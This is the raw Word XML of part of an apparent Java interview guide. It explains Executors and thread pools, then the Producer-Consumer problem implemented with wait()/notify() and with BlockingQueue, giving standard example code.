      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="281"/>
    </w:p>
    <w:p w14:paraId="429831D1" w14:textId="46CE51D5" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E"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In Java, </w:t>
      </w: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are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 breakdown of the significance and usage of Executors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA4AD75"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of Executors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F439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Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F0A26B"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higher-level replacement for manually managing threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05939CF2"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You submit tasks (usually instances of Runnable or Callable) to the executor instead of creating new threads directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF89AA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is decouples the code that performs the task from the code that manages threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E50B421"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hread Pool Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B452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manage a pool of threads for task execution, which can help improve performance by reusing existing threads instead of creating new ones each time a task is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639E4D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read pools reduce the overhead of thread creation and destruction, thus optimizing the system's resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C813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automatically handle the thread lifecycle (thread creation, re-use, and termination), making thread management easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6F46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039AD4D6"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Concurrency Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C38973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lastRenderedPageBreak/>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Asynchronous Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FF9D9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3C43CE49"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handle exceptions thrown during task execution. If a task fails (i.e., it throws an exception), the executor framework can capture and process that exception, making error handling more manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104D9CFD"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ypes of Executors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8C60EB"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w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The most basic interface that defines methods for task submission. It only provides the execute() method, which takes a Runnable task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006EC40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3463244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 executor = Executors.newFixedThreadPool(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A73623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execute(new RunnableTask());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B42E4"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7C43419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 executorService = Executors.newFixedThreadPool(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B37257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Future&lt;?&gt; future = executorService.submit(new CallableTask());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA49B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shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF208DC"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ScheduledExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Extends ExecutorService and adds methods to schedule tasks to run after a fixed delay or periodically. It is ideal for tasks that need to be executed at regular intervals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664AB65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5B41057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 scheduledExecutorService = Executors.newScheduledThreadPool(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687B570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scheduleAtFixedRate(new RunnableTask(), 0, 1, TimeUnit.SECONDS);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5CB14"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mmon Executor Implementations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650CB8EC"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FixedThreadPool(int nThreads)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341F1CD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with a fixed number of threads. If all threads are busy, new tasks will be queued until a thread becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2152F"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for limiting the number of concurrent threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1384F0"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CachedThreadPool()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DFD55D"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reates new threads as needed, but reuses previously constructed threads when they are available. It is ideal for handling many short-lived asynchronous tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46091319"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ingleThreadExecutor()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652E7667"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n executor that uses a single worker thread to execute tasks sequentially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428142D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when you need to ensure that tasks are executed one after the other in a single-threaded manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EDB10E"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cheduledThreadPool(int corePoolSize)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AE517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an schedule tasks with a fixed-rate or fixed-delay execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A77DA9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d for executing periodic tasks at specified intervals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230961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Using Executors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E46808"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hread Pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A77D2F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use thread pools, which reduces the overhead of creating and destroying threads repeatedly. This improves performance by reusing threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E4782A"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Simplified Code</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E2AC7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abstract away the complexities of manually creating, managing, and terminating threads. This simplifies concurrent programming, making the code cleaner and less error-prone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FF1677"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Improved Resource Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230DA6C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help manage the number of concurrent threads and ensure that system resources (like CPU and memory) are used efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC3E81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For example, a FixedThreadPool can ensure that no more than a specified number of threads run concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAAFB31"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Graceful Shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D735BEC"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provide methods such as shutdown() and shutdownNow() to gracefully terminate the threads, ensuring that the tasks are completed before shutting down the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9A2D65"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4ECC728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handle exceptions thrown by tasks and can manage retries or logging, making it easier to manage task failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1452822F"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3C58F015"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to run after a certain delay or periodically, making them suitable for tasks such as background services, cron-like jobs, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFF3982"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Executors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E0EEF"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demonstrating the usage of an ExecutorService to manage a pool of threads and submit tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099FD77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418E430" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F6F2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ExecutorExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D47673" w14:textId="77777777" w:rsidR="002D1F4E" w:rsidRPr="004E218C" w:rsidRDefault="002D1F4E" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED10FDC"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55A755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an ExecutorService with a fixed thread pool of 4 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A536AC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4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D346A0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ED35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ubmit tasks to the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE5E3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0; i &lt; 10; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157104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 -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBDD64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CD274B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imulate task execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D4E4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s executing a task.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226129C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1000); // Simulating work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048BB0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7DF63B2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printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A474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BBC70C3"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73EC71A"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E68F74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E2450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hutdown the executor service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327F74F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EB6E3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46437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07961E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5130259"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in Java provide a higher-level, easier-to-use alternative to managing threads manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654DD14B"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They improve resource management, simplify concurrent programming, and make thread creation, scheduling, and execution more efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75631697"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 xml:space="preserve">By using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and other executor implementations, developers can improve performance, scalability, and maintainability of concurrent applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE56A0F" w14:textId="73C165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7" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC56881" w14:textId="5356C396" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="004F4443">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="282" w:name="_Toc197867496"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the Producer Consumer problem and how would you implement it using wait(), notify() or BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="282"/>
    </w:p>
    <w:p w14:paraId="63326740" w14:textId="5FAFCA95" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262"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example of a multi-threading problem where there are two types of threads: </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producers</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consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The producer thread produces data and places it into a shared resource (e.g., a buffer or queue), while the consumer thread consumes data from the shared resource. The challenge is to ensure that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAFE72E"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producer doesn't add data to a full buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A449CE3"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consumer doesn't consume data from an empty buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75438DBF"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threads need to wait and notify each other when the buffer is either full or empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA1DE0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wait() and notify():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD0C1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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC44D5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xml:space="preserve"> thread produces an item and places it in a buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D84CE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xml:space="preserve"> thread consumes an item from the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B70F8"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full, the producer waits until the consumer consumes an item.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F9AA44"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empty, the consumer waits until the producer adds an item.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1205DA2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Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058FEAB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elow is a simple implementation of the Producer-Consumer problem using wait() and notify():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2BECF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LinkedList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192F411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Queue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E1A69D" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC1ADE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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64393AB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028EDA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Queue&lt;Integer&gt; buffer = new LinkedList&lt;&gt;(); // Shared buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D549357" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A543C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0F260B9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4197D2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786FDA3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761342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full, wait for the consumer to consume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDE9C3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size() == CAPACITY) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061C3BD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043111C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full. Producer is waiting...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6983FB9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075803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568C684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389268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983F3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BD2A7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buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1223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14ED33D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uffer.add(item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE9EDC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B54F4F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consumer that an item has been produced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75468EC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DF78F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2FDF6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9AB6E2" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5366B9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26EBC11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3D5C196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114844A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1C7EEDF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empty, wait for the producer to produce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C367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isEmpty()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5443026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9BFC43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empty. Consumer is waiting...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD859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52EAF7A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B2B615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A43004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76DA4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457B7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buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2432BB7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buffer.poll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F94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0D1260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producer that an item has been consumed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FCE0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46AE1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90A23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ACAC64" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5E54F0"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9ED688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 pc = new ProducerConsumer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF1D98" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BAF05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5483D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6007465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1222C42A" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ACC2E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6610EF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32D3894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7845ACB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FF35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0ACC8EE"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4FA512E6"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Buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We use a Queue&lt;Integer&gt; (a LinkedList) as the shared buffer where producers will add items and consumers will take items from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD2E37D"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Producer Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576DF565"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producer thread will add items to the buffer. If the buffer is full (i.e., buffer.size() == CAPACITY), the producer waits until there is space available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306C0C5E"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releases the lock on the buffer and makes the producer thread wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C234279"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Once an item is added to the buffer, the producer thread calls notify() to notify the consumer that an item is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB9EB02"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Consumer Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A797768"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consumer thread will remove items from the buffer. If the buffer is empty (i.e., buffer.isEmpty()), the consumer waits until there is something to consume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E695CA"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is used to make the consumer thread wait when the buffer is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D4B63"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After consuming an item, the consumer calls notify() to notify the producer that there is space in the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E11E91B"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BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4028B05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has two main methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FC5F5"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put()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adds an item to the queue. If the queue is full, it waits until space becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299A0AC4"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take()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes and returns an item from the queue. If the queue is empty, it waits until an item becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159BD4F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BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16463F8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ArrayBlockingQueue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20000D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BlockingQueue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D142566" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EB91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WithBlockingQueue {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10422D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55DCBDD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BlockingQueue&lt;Integer&gt; queue = new ArrayBlockingQueue&lt;&gt;(CAPACITY); // Shared buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106BF132" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1810C9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572077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139DC52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26A0636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7212F7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queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA659B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74CC3DA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queue.put(item); // Blocks if the queue is full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A664C1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182FEE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397AB6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33C17F6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14146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048922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1CDF40" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DAD93B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07087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69F53BC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0003AD9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8285C3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queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F659CD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queue.take(); // Blocks if the queue is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683DDD7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286731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9F54E7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72CEF9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54E26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87DCBE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D0431E3" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14FAAA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F6DE24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WithBlockingQueue pc = new ProducerConsumerWithBlockingQueue();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658F8035" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D36622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3A6101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3685A10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3F7FF185" w14:textId="77777777" w:rsidR="00837262" w:rsidRPr="004E218C" w:rsidRDefault="00837262" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
